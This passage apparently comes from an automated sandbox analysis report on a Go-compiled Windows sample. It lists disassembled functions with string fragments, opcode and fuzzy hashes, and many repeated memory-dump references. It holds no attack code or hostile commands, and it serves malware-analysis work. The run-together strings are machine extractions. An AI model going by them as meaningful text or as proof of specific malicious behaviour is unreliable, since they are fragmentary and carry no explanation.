              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: $!$runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAdd$runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
              • API String ID: 0-464846790
              • Opcode ID: 7370240acd6ea40d769a7ce133bc7452ccceed5e0a85e29c0e8d6efac5bf49d2
              • Instruction ID: 98ea1d24e8b49e2d8a4d2321c15fa4a87ac3bf83fa3ff4e775b38c75d41fe80b
              • Opcode Fuzzy Hash: 7370240acd6ea40d769a7ce133bc7452ccceed5e0a85e29c0e8d6efac5bf49d2
              • Instruction Fuzzy Hash: 543102B4609701CFC709EF28E09576EBBE1EB88314F10882DF49987351DB399988CB52
              Function 007DDF70 Relevance: 5.1, Strings: 4, Instructions: 86COMMON
              Download Yara Rule
              Strings
              • runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConsoleModeGetProcAddressProcess32NextWSetFileP, xrefs: 007DE091
              • ", xrefs: 007DE04E
              • attempted to trace a bad status for a goroutineattempting to link in too many shared librariesunable to get usable HTTP transport from clientRtlDosPathNameToRelativeNtPathName_U_WithStatusbufio: reader returned negative count from Readreflect.Value.Bytes of un, xrefs: 007DE0C5
              • /, xrefs: 007DE0CE
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: "$/$attempted to trace a bad status for a goroutineattempting to link in too many shared librariesunable to get usable HTTP transport from clientRtlDosPathNameToRelativeNtPathName_U_WithStatusbufio: reader returned negative count from Readreflect.Value.Bytes of un$runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConsoleModeGetProcAddressProcess32NextWSetFileP
              • API String ID: 0-1775125088
              • Opcode ID: e3071baab2f3a736500a54ee49b82ef86e88126a23759faf530b0e08bf9b8e2e
              • Instruction ID: 0c1511c05cbc91bed4e2332d262d1ee0514cb5a4db0a2f8a9a6ff282d000e5d7
              • Opcode Fuzzy Hash: e3071baab2f3a736500a54ee49b82ef86e88126a23759faf530b0e08bf9b8e2e
              • Instruction Fuzzy Hash: B84187B4508385DFC301EF69C09865AFBE0BB89744F50892EE8D887352D7B8A948CB53
              Function 007B7450 Relevance: 5.1, Strings: 4, Instructions: 74COMMON
              Download Yara Rule
              Strings
              • runtime.newosprocruntime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec , xrefs: 007B7564
              • already; errno=runtime stack:invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobje, xrefs: 007B751F
              • ., xrefs: 007B74F9
              • runtime: failed to create new OS thread (have runtime: panic before malloc heap initializedstopTheWorld: not stopped (status != _Pgcstop)signal arrived during external code executionruntime: name offset base pointer out of rangeruntime: type offset base poin, xrefs: 007B74F0
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: already; errno=runtime stack:invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobje$.$runtime.newosprocruntime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec $runtime: failed to create new OS thread (have runtime: panic before malloc heap initializedstopTheWorld: not stopped (status != _Pgcstop)signal arrived during external code executionruntime: name offset base pointer out of rangeruntime: type offset base poin
              • API String ID: 0-4153645543
              • Opcode ID: e69ef8b7ba8e9cd1c47c946b0531feecc42bd933bbc15a1b602701a2fa27a652
              • Instruction ID: 69117abb1c773b78ea9479b040c31d6f2b1dd0d2336a5c61ce660b5db1180555
              • Opcode Fuzzy Hash: e69ef8b7ba8e9cd1c47c946b0531feecc42bd933bbc15a1b602701a2fa27a652
              • Instruction Fuzzy Hash: 7331BFB4509705DFD704EF68D1897AEBBE4BF88708F00892DF88887355EB789984DB52
              Function 00789540 Relevance: 5.1, Strings: 4, Instructions: 71COMMON
              Download Yara Rule
              Strings
              • @q~, xrefs: 007895B7, 007895C0
              • internal error: exit hook invoked exitunreachable method called. linker bug?concurrent map iteration and map writeelem size not a multiple of elem aligngcBgMarkWorker: blackening not enabledcannot read stack of running goroutineruntime: blocked read on free po, xrefs: 0078963C
              • internal error: exit hook invoked panicmismatched count during itab table copyout of memory allocating heap arena map/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span stat, xrefs: 0078961F
              • &, xrefs: 00789645
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: &$@q~$internal error: exit hook invoked exitunreachable method called. linker bug?concurrent map iteration and map writeelem size not a multiple of elem aligngcBgMarkWorker: blackening not enabledcannot read stack of running goroutineruntime: blocked read on free po$internal error: exit hook invoked panicmismatched count during itab table copyout of memory allocating heap arena map/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span stat
              • API String ID: 0-2790454597
              • Opcode ID: c37f1c9bf6c2e35fd38c19056fcb5cf2a79708291a4aaf40392ca442e5c688d0
              • Instruction ID: 8683885f1b3b2c706b45277357d415b044263f709029fba1a4e29e76a699e930
              • Opcode Fuzzy Hash: c37f1c9bf6c2e35fd38c19056fcb5cf2a79708291a4aaf40392ca442e5c688d0
              • Instruction Fuzzy Hash: 2E31AD7064A241DFE322FF24E48477ABBF1EB89314F48481CD9858B395E779A815CB52
              Function 007B1CD0 Relevance: 5.1, Strings: 4, Instructions: 64COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: $ $ $
              • API String ID: 0-3535155489
              • Opcode ID: 9fa3eaa0a3933f7ab602d48cffb0369479190ef79ab355fb3b684304faa1aebe
              • Instruction ID: d498e51b084b0a96ce986fa68c0a338001b16df068a2fc1f467c8a49aeb0db88
              • Opcode Fuzzy Hash: 9fa3eaa0a3933f7ab602d48cffb0369479190ef79ab355fb3b684304faa1aebe
              • Instruction Fuzzy Hash: 21318174608385CFD768DF15D0A4B9ABBE2BBC9304F90881DE49987751DB39A948CF43
              Function 007A4000 Relevance: 5.1, Strings: 4, Instructions: 57COMMON
              Download Yara Rule
              Strings
              • ?, xrefs: 007A40D2
              • malformed GOMEMLIMIT; see `go doc runtime/debug.SetMemoryLimit`invalid value for environment variable, %s=%s, need true, falseclient configured for dualstack but not supported for operationlicense-manager-user-subscriptions-fips.us-east-1.amazonaws.comlicense-, xrefs: 007A40C9
              • GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pc, xrefs: 007A4017
              • GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime, xrefs: 007A4095
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: ?$GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pc$GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime$malformed GOMEMLIMIT; see `go doc runtime/debug.SetMemoryLimit`invalid value for environment variable, %s=%s, need true, falseclient configured for dualstack but not supported for operationlicense-manager-user-subscriptions-fips.us-east-1.amazonaws.comlicense-
              • API String ID: 0-498767748
              • Opcode ID: f2dbd53fba5b4f2fc657cbe8ea78f5eb6d3147ddbd77aaa43d9bfb3b4d1135c5
              • Instruction ID: efecc37153e43800920948be2726d00911966e8661012748b816273081611f95
              • Opcode Fuzzy Hash: f2dbd53fba5b4f2fc657cbe8ea78f5eb6d3147ddbd77aaa43d9bfb3b4d1135c5
              • Instruction Fuzzy Hash: 322125B4508341CFC700EF34D08566ABBE0FBC9314F508A5DE4E887252D77A8944DB53
              Function 007A66F0 Relevance: 5.1, Strings: 4, Instructions: 57COMMON
              Download Yara Rule
              Strings
              • runtime: inUse=runtime: max = bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]morebuf={pc:: no frame (sp=runtime: frame runtimer: bad ptraceback stuckruntime.gopanicadvertise errorkey h, xrefs: 007A6757
              • ", xrefs: 007A67C2
              • too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timertoo many references: c, xrefs: 007A67B9
              • npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUplo, xrefs: 007A6785
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
